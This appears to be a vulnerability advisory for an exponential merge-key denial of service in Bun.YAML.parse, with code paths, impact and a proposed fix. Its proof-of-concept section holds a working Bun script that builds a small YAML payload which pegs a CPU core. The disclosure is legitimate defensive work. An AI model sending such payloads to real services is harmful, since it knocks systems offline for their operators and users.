Summary
Exponential merge keys in Bun.YAML.parse trigger CPU exhaustion
Bun.YAML.parse materialises YAML mappings by iterating every merge (<<) entry and blindly appending the referenced property list to the target object (src/bun.js/api/YAMLObject.zig:1034-1045). Because the loop does not track merge depth or repeated anchors, an attacker can craft a document where each level merges all previous anchors (<<: [*a0, *a1, …]). The parser repeatedly copies the entire accumulated property array for each level, resulting in exponential work while the payload remains only a few kilobytes. Running the supplied payload against Bun 1.3.0 (bun --eval …) shows parse times climbing past 9 seconds on a single CPU core, enabling a trivial network DoS via untrusted YAML input.
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Source → Sink
src/bun.js/api/YAMLObject.zig
Line 915-960 · Bun.YAML.parse
src/bun.js/api/YAMLObject.zig
Line 1034-1045 · ParserCtx.toJS (object materialisation loop)
Attack surface
Any Bun application that calls Bun.YAML.parse (or YAML.parse) on user-controlled data—configuration endpoints, API payloads, etc.—is affected.
Preconditions
None; the attacker only needs the ability to submit a YAML document. No authentication or special privileges are required.
Impact
Repeated requests allow an unauthenticated attacker to peg a CPU core and starve other work, causing a denial of service. Memory usage also spikes due to repeated property duplication.
Exploit path
How the issue forms.
Bun.YAML.parse accepts attacker-controlled input and invokes the YAML parser without imposing size or recursion limits.
const input_value = callFrame.argumentsAsArray(1)[0];parseFlowMapping / parseBlockMapping build AST nodes whose properties slices simply inline every merge (<<) target, duplicating anchors instead of referencing them.
try props.appendSlice(value_obj.properties.slice());ParserCtx.toJS iterates the properties slice and converts each entry into JS strings/values with no merge-depth accounting.
const key_str = try key.toBunString(ctx.global);
try obj.putMayBeIndex(ctx.global, &key_str, value);putMayBeIndex stores each property on the JS object, so the exponential number of duplicated keys translates directly into CPU time before YAML.parse returns to user code.
object->putDirectMayBeIndex(...);Proof of concept
Reproduction.
Environment
Requirements: macOS 15.1 (Apple M1), Bun 1.3.0 (system install).
Verify version:
bun --version
# 1.3.0
Configuration
Execute the following script, which builds a depth-24 merge payload (~2.2 KB) and measures parse time:
/usr/bin/env bun --eval '
import { YAML } from "bun";
function build(depth) {
const lines = [];
lines.push(`a0: &a0\n k0: 0`);
for (let i = 1; i <= depth; i++) {
const refs = Array.from({ length: i }, (_, j) => `*a${j}`).join(", ");
lines.push(`a${i}: &a${i}\n <<: [${refs}]\n k${i}: ${i}`);
}
lines.push(`root:\n <<: *a${depth}`);
return lines.join("\n");
}
const payload = build(24);
const start = Date.now();
YAML.parse(payload);
console.log({ depth: 24, durationMs: Date.now() - start, payloadBytes: payload.length });
'
Delivery
Outcome
Bun.YAML.parse spends ~9.5 seconds materialising a 2.2 KB document, allowing a remote attacker to keep a core saturated by repeatedly sending the payload. Higher depths continue to grow exponentially, so parallel requests can knock the process offline entirely.
Remediation
Guidance.
Deduplicate merge keys while tracking merge depth or anchor references so each YAML node is materialised at most once. The patch under review introduces a MappingProps helper (src/interchange/yaml.zig:986-1041) that:
-
Keeps a set of seen keys when applying merges, preventing unbounded duplication.
-
Reuses existing
propertieslists instead of copying them repeatedly.
Ensure similar safeguards exist for both flow and block mappings, and add unit tests (e.g., test/js/bun/yaml/yaml.test.ts) that parse the PoC payload with a tight timeout to prevent regressions. Consider also rejecting documents that exceed a reasonable merge depth or property count to provide a defense in depth.
Before
After
